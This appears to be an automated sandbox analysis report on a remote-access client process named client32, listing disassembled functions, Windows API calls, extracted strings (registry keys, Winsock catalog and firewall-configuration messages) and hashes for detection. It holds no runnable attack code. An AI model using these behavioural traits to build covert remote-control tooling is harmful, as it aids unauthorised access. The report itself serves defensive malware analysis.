                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                                                                                                    • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                                                                                                    • API String ID: 1360380336-1843585929
                                                                                                                                                                                                    • Opcode ID: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
                                                                                                                                                                                                    • Instruction ID: 42ad6cadc272536a2ff2776ff80aeab67ed087ff2e94416cc8d5ca3a43c0c877
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7501D4B5240341AFE6209B709D94F6B77ACAB50B00F50481DF9669B2C0EA71F840C724
                                                                                                                                                                                                    Function 11141AB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                                                                                      • Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11141AF5
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                                                    • API String ID: 4251163631-545709139
                                                                                                                                                                                                    • Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                                                                                    • Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92
                                                                                                                                                                                                    Function 110151F0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110152AA
                                                                                                                                                                                                    • _memset.LIBCMT ref: 110152EE
                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • NSLSP, xrefs: 11015338
                                                                                                                                                                                                    • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B
                                                                                                                                                                                                    • PackedCatalogItem, xrefs: 11015312
                                                                                                                                                                                                    • %012d, xrefs: 110152A4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValue_memsetwsprintf
                                                                                                                                                                                                    • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                                                                                    • API String ID: 1333399081-1346142259
                                                                                                                                                                                                    • Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                                                                                    • Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51
                                                                                                                                                                                                    Function 1100FF90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 11010064
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11010072
                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010085
                                                                                                                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 2427920155-3145022300
                                                                                                                                                                                                    • Opcode ID: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
                                                                                                                                                                                                    • Instruction ID: eb2297de3126562b7a6adfe99aab1db74979c6a8f9cac3cb144437a799ef2362
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B631E635E002658FCB52CF94C880BAEF7B4FB0536CF404269E865AB298DB75AD00CB91
                                                                                                                                                                                                    Function 685A6940 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 166COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A6950
                                                                                                                                                                                                      • Part of subcall function 685A7BE0: _memset.LIBCMT ref: 685A7BFF
                                                                                                                                                                                                      • Part of subcall function 685A7BE0: _strncpy.LIBCMT ref: 685A7C0B
                                                                                                                                                                                                      • Part of subcall function 6859A4E0: EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
                                                                                                                                                                                                      • Part of subcall function 6859A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
                                                                                                                                                                                                      • Part of subcall function 6859A4E0: Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
                                                                                                                                                                                                      • Part of subcall function 6859A4E0: LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                                                                                                    • String ID: 1.2$BlZh$Channel$Client$Publish %d pending services
                                                                                                                                                                                                    • API String ID: 1112461860-429780693
                                                                                                                                                                                                    • Opcode ID: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
                                                                                                                                                                                                    • Instruction ID: 5d3ed0157c170679b21c14aa78076d12a51ce1c935d438aa56610adfde399586
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA51AD35A043498FEF10DB7CD894BAE7BE5AB46308F910129DE6193281EB31ED45CB99
                                                                                                                                                                                                    Function 11141240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                                                                                    • API String ID: 3494822531-1878648853
                                                                                                                                                                                                    • Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                                                                                    • Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92
                                                                                                                                                                                                    Function 111042A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 11104424
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11104439
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$CreateEventException@8Throw_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                                                    • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                                                                                                                    • API String ID: 1187064156-2390547818
                                                                                                                                                                                                    • Opcode ID: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
                                                                                                                                                                                                    • Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51
                                                                                                                                                                                                    Function 11139340 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
                                                                                                                                                                                                    • KillTimer.USER32(00000000,00007F2D,TermUI...), ref: 111393C3
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113943B
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeKillLibraryTimer
                                                                                                                                                                                                    • String ID: (r$TermUI
                                                                                                                                                                                                    • API String ID: 2006562601-2801693061
                                                                                                                                                                                                    • Opcode ID: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                                                                                    • Instruction ID: bc9711c706b9d41bf1b1aa53e8d725085e588c5fb78ea17b568d689d6d6e9679
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F03158B16135349BD202DFE9CDC0A7AFBAAABC5B1C711402AF4258720CF770A841CF92
                                                                                                                                                                                                    Function 11135BC0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • AutoICFConfig, xrefs: 11135C10
                                                                                                                                                                                                    • DoICFConfig() OK, xrefs: 11135C96
                                                                                                                                                                                                    • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 11135CAC
                                                                                                                                                                                                    • Client, xrefs: 11135C15
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
